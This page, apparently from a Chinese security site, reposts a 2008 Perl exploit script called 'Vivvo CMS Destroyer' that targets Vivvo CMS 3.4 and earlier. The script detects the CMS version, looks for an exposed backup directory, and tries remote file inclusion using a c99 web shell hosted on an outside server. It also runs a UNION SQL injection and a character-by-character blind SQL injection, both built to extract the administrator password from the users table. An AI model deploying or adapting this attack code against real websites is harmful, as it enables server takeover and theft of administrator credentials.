首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Vivvo CMS <= 3.4 Multiple Vulnerabilities Destroyer Exploit
来源:uxmal666@gmail.com 作者:uxmal666 发布时间:2008-10-20  
#!/usr/bin/perl

#Vivvo CMS Destroyer
#uxmal666@gmail.com
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------

print "\n                           Vivvo CMS Destroyer By Xianur0\n";

#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
  use LWP::UserAgent;
  use Switch;
  my $path = $ARGV[0];
  $path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
  $ua = LWP::UserAgent->new;
  $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
  $req = HTTP::Request->new(GET => $path."/feed.php?output_type=rss");
  $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
  $res = $ua->request($req);
  if ($res->is_success && $res->content =~ "generator") {
&parser($res->content);
  } else {
  $req = HTTP::Request->new(GET => $path."/index.php?feed");
  $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
  $res = $ua->request($req);
  if ($res->is_success && $res->content =~ "generator") {
&parser($res->content);
  }
    else { print "\nError getting data!\n"; exit;}
  }

&backups;


sub parser {
my @datos = split('Vivvo CMS ', $_[0]);
my @version = split('', $datos[1]);
$version = $version[0];
if($version[0] == "") {
my @datos = split('', $datos[1]);
$version = $version[0];
}
print "Version: ".$version."\n";
if($version < "4") { print "Outdated version of Vivvo CMS!\n"; &desactualizada($version);}
}

sub backups {
  $req = HTTP::Request->new(GET => "$path/backup");
  $req->header('Accept' => 'text/xml');
  $res = $ua->request($req);
  if ($res->is_success) {
if($res->content =~ "Index of /backup") {
print "\n              Backups:\n";
my @datos = split('', $archivos);
if($archivo[0] !~ /\?/){print $archivo[0]."\n"; }
}
print "\nUnprotected Directory: $path/backup\n";
  }
}
}

sub rfi {
$vuln = $_[0];
  $req = HTTP::Request->new(GET => "$path/$vuln=$SHELL?");
  $req->header('Accept' => 'text/xml');
  $res = $ua->request($req);
  if ($res->is_success) {
if($res->content =~ $textshell) {
print "RFI Detected!: $path/$vuln=$SHELL?";
  }
}}

sub sql {
$exploit = "pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=1";
  $req = HTTP::Request->new(GET => "$path/$exploit");
  $req->header('Accept' => 'text/xml');
  $res = $ua->request($req);
  if ($res->is_success) {
print "SQL Injection Generated: $path$exploit";
}
}

sub blind {
for($i=1; $i<32;$i++) {
for($o=30; $o<102;$o++) {
$injection = "$path/index.php?category=/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),".$i.",1))=".$o;
  $req = HTTP::Request->new(GET => $injection);
  $req->header('Accept' => 'text/xml');
  $res = $ua->request($req);
  if ($res->is_success) {
if($res->content != "") {
print "Blind Done Correctly!: $injection";
  }
}
}}}

sub desactualizada {
$version = $_[0];
  switch ($version) {
    case "3.4"    { print "Blind SQL Injection trying ....\n"; &blind; print "Intentando RFI....\n"; &rfi('include/db_conn.php?root');}
    case "3.2"    { print "RFI trying ....\n"; &rfi('index.php?classified_path'); print "SQL Injection....\n"; &sql;}
        else { print "There is no registration for this Exploit Version! : (\n";}
    }
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BitTorrent 6.0.3 .torrent File
·WBB Plugin rGallery 1.09 (item
·Solaris 9 [UltraSPARC] sadmind
·e107 <= 0.7.13 (user_hidden_fi
·PHP Easy Downloader <= 1.5 Rem
·Nuke ET <= 3.4 (fckeditor) Rem
·miniBloggie 1.0 (del.php) Remo
·Meeting Room Booking System (M
·zeeproperty (adid) Remote SQL
·Dart Communications PowerTCP F
·phpFastNews 1.0.0 Insecure C
·XOOPS Module GesGaleri (katego
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved